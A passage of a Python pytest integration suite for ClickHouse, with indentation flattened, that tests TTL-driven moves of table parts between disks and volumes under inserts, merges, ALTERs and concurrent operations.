cluster.shutdown()
def get_random_string(length):
symbols = bytes(string.ascii_uppercase + string.digits)
result_list = bytearray([0]) * length
for i in range(length):
result_list[i] = random.choice(symbols)
return str(result_list)
def get_used_disks_for_table(node, table_name, partition=None):
if partition is None:
suffix = ""
else:
suffix = "and partition='{}'".format(partition)
return node.query("""
SELECT disk_name
FROM system.parts
WHERE table == '{name}' AND active=1 {suffix}
ORDER BY modification_time
""".format(name=table_name, suffix=suffix)).strip().split('\n')
def check_used_disks_with_retry(node, table_name, expected_disks, retries):
for _ in range(retries):
used_disks = get_used_disks_for_table(node, table_name)
if set(used_disks).issubset(expected_disks):
return True
time.sleep(0.5)
return False
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination", "MergeTree()", 0),
("replicated_mt_test_rule_with_invalid_destination",
"ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')", 0),
("mt_test_rule_with_invalid_destination", "MergeTree()", 1),
("replicated_mt_test_rule_with_invalid_destination",
"ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')", 1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_inserts_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')", 0),
("mt_test_inserts_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_inserts_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')", 1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1 if i > 0 or positive else time.time() + 300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
pass
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_work_after_storage_policy_change", "MergeTree()"),
("replicated_mt_test_moves_work_after_storage_policy_change",
"ReplicatedMergeTree('/clickhouse/test_moves_work_after_storage_policy_change', '1')"),
])
def test_moves_work_after_storage_policy_change(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
""".format(name=name, engine=engine))
node1.query(
"""ALTER TABLE {name} MODIFY SETTING storage_policy='default_with_small_jbod_with_external'""".format(
name=name))
# Second expression is preferred because d1 > now()-3600.
node1.query(
"""ALTER TABLE {name} MODIFY TTL now()-3600 TO DISK 'jbod1', d1 TO DISK 'external'""".format(name=name))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_moves_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')", 0),
("mt_test_moves_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_moves_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')", 1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work", "MergeTree()"),
("replicated_mt_test_moves_to_volume_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append(
(str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work", "MergeTree()", 0),
("replicated_mt_test_inserts_to_volume_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')", 0),
("mt_test_inserts_to_volume_work", "MergeTree()", 1),
("replicated_mt_test_inserts_to_volume_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')", 1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1 if i > 0 or positive else time.time() + 300))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work", "MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(
("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {} NO DELAY".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name_temp))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
def test_replicated_download_ttl_info(started_cluster):
name = "test_replicated_ttl_info"
engine = "ReplicatedMergeTree('/clickhouse/test_replicated_download_ttl_info', '{replica}')"
try:
for i, node in enumerate((node1, node2), start=1):
node.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
node2.query("INSERT INTO {} (s1, d1) VALUES ('{}', toDateTime({}))".format(name, get_random_string(1024 * 1024),
time.time() - 100))
assert set(get_used_disks_for_table(node2, name)) == {"external"}
time.sleep(1)
assert node1.query("SELECT count() FROM {}".format(name)).splitlines() == ["1"]
assert set(get_used_disks_for_table(node1, name)) == {"external"}
finally:
for node in (node1, node2):
try:
node.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
continue
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_merges_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')", 0),
("mt_test_merges_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_merges_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')", 1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work", "MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"} # Merged to the same disk against the rule.
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name_temp))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work", "MergeTree()", 0),
("replicated_mt_test_moves_after_merges_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')", 0),
("mt_test_moves_after_merges_work", "MergeTree()", 1),
("replicated_mt_test_moves_after_merges_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')", 1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work", "MergeTree()", 0, "DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')", 0, "DELETE"),
("mt_test_moves_after_alter_work", "MergeTree()", 1, "DELETE"),
("replicated_mt_test_moves_after_alter_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')", 1, "DELETE"),
("mt_test_moves_after_alter_do_not_work", "MergeTree()", 0, "TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')", 0, "TO DISK 'external'"),
("mt_test_moves_after_alter_work", "MergeTree()", 1, "TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')", 1, "TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(
("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_materialize_ttl_in_partition", "MergeTree()"),
("replicated_mt_test_materialize_ttl_in_partition",
"ReplicatedMergeTree('/clickhouse/test_materialize_ttl_in_partition', '1')"),
])
def test_materialize_ttl_in_partition(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int8,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY p1
PARTITION BY p1
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append((str(i), "'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 TO DISK 'external' SETTINGS materialize_ttl_after_modify = 0
""".format(name=name))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 2
""".format(name=name))
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 4
""".format(name=name))
time.sleep(0.5)
used_disks_sets = []
for i in range(len(data)):
used_disks_sets.append(set(get_used_disks_for_table(node1, name, partition=i)))
assert used_disks_sets == [{"jbod1"}, {"jbod1"}, {"external"}, {"jbod1"}, {"external"}]
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == str(len(data))
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 34 SECOND TO DISK 'jbod2',
d1 + INTERVAL 64 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 14 SECOND TO VOLUME 'external',
d1 + INTERVAL 19 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
if positive:
expected_disks = {"external"}
else:
expected_disks = {"jbod1", "jbod2"}
check_used_disks_with_retry(node1, name, expected_disks, 50)
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
for i in range(50):
rows_count = int(node1.query("SELECT count() FROM {name}".format(name=name)).strip())
if positive:
if rows_count == 0:
break
else:
if rows_count == 3:
break
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
time.sleep(0.5)
if positive:
assert rows_count == 0
else:
assert rows_count == 3
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt", "MergeTree()"),
("concurrently_altering_ttl_replicated_mt",
"ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({random.randint(1, 1000000) for _ in range(0, 1000)})
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query(
"SELECT name from system.parts where table = '{}' and active = 1".format(
name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(
["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'",
"TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
try:
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
except QueryRuntimeException:
pass
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name), settings={'optimize_throw_if_noop': '1'})
break
except:
pass
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.skip(reason="Flacky test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query(
"INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query(
"SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
time.sleep(1)
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
# Fill jbod1 to force ClickHouse to make move of partition 1 to external.
node1.query(
"INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query(
"INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query(
"INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
time.sleep(1)
# If SELECT locked old part on external, move shall fail.
assert node1.query(
"SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
